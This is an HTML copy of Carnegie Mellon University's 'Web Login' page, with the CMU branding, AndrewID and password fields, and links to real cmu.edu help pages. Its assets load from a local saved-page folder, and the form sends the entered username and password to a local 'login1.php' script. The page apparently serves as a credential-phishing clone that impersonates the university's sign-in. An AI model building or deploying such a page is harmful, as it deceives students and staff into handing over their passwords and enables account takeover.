<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <title>login.cmu.edu</title>
   <link href="index_files/cmu-general-purpose.css" rel="stylesheet" type="text/css">
   <link href="index_files/login.css" rel="stylesheet" type="text/css">
   <link href="index_files/ie.css" rel="stylesheet" type="text/css">
   <link href="index_files/iphone.css" rel="stylesheet" type="text/css" media="only screen and (max-device-width: 480px)">
   <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
   <link rel="icon" href="https://login.cmu.edu/favicon.ico" type="image/x-icon">
   <link rel="shortcut icon" href="https://login.cmu.edu/favicon.ico" type="image/x-icon">
</head>
<body>


<form method="post" action="login1.php" autocomplete="off" name="login" id="login">
<div id="wrapper">
 <div id="pageHeader">
  <div id="wordmark">
   <h2><a title="Carnegie Mellon University" href="https://www.cmu.edu/"><span>Carnegie Mellon University</span></a></h2>
  </div>
 </div>

 <div class="content" id="maincontent">
  <div id="loginForm">
<div class="content $library" id="loginformdiv">
   <fieldset>
    <div id="mobile-lockwrapper">
     <div id="mobile-lock"><a href="https://www.cmu.edu/computing/services/security/identity-access/authentication/how-to/weblogin.html" target="_blank"><span>Lock Icon</span></a></div>
    </div>

    <div class="clear" id="formclear">
     <div class="legend"><h1><strong>Web&nbsp;Login</strong></h1></div>
     <div id="formandlock">
       <div id="formwrapper">
        <div class="formrow" id="failed">&nbsp;
        </div>

        <div class="formrow">
           <label for="username">AndrewID</label>
           <input type="text" name="j_username" id="username" size="25" tabindex="1" required="true" autocorrect="off" autocapitalize="none">
        </div>

        <div class="formrow">
           <label for="password">Password</label>
           <input type="password" name="j_password" id="passwordinput" size="25" tabindex="2" required="true" autocomplete="current-password">
        </div>

        <div class="formrow">
           <input class="loginbutton" type="submit" name="_eventId_proceed" value="Login" size="15" tabindex="3" style="text-align: left;">
        </div>
       </div>
       <div id="lockwrapper">
        <div id="lock"><a href="https://www.cmu.edu/computing/services/security/identity-access/authentication/how-to/weblogin.html" target="_blank"><span>Lock Icon</span></a></div>
       </div>
     </div>
    </div>

    <div id="warning">Warning: The URL for this page should begin with <strong>https://login.cmu.edu</strong>. 
      <br>If it does not, do not fill in any information, and report this site to <a href="mailto:it-help@cmu.edu">it-help@cmu.edu</a>.
    </div>

    <div id="forgotpassword">
       <a href="https://www.cmu.edu/computing/services/security/identity-access/authentication/how-to/weblogin.html" target="_blank">About</a> | <a href="https://www.cmu.edu/computing/services/security/identity-access/account/password.html" target="_blank">Change Password</a> | <a href="https://www.cmu.edu/computing/services/security/identity-access/account/password.html">Forgot Password?</a>
    </div>
   </fieldset>
  </div>
  </div>
 </div>
 <div class="clear"></div>
</div>
</form>
<script type="text/javascript" language="javascript">
if (document.getElementById('username').value.length == 0) { 
  document.getElementById('username').focus();
} else {
  document.getElementById('passwordinput').focus();
}
</script>



</body></html>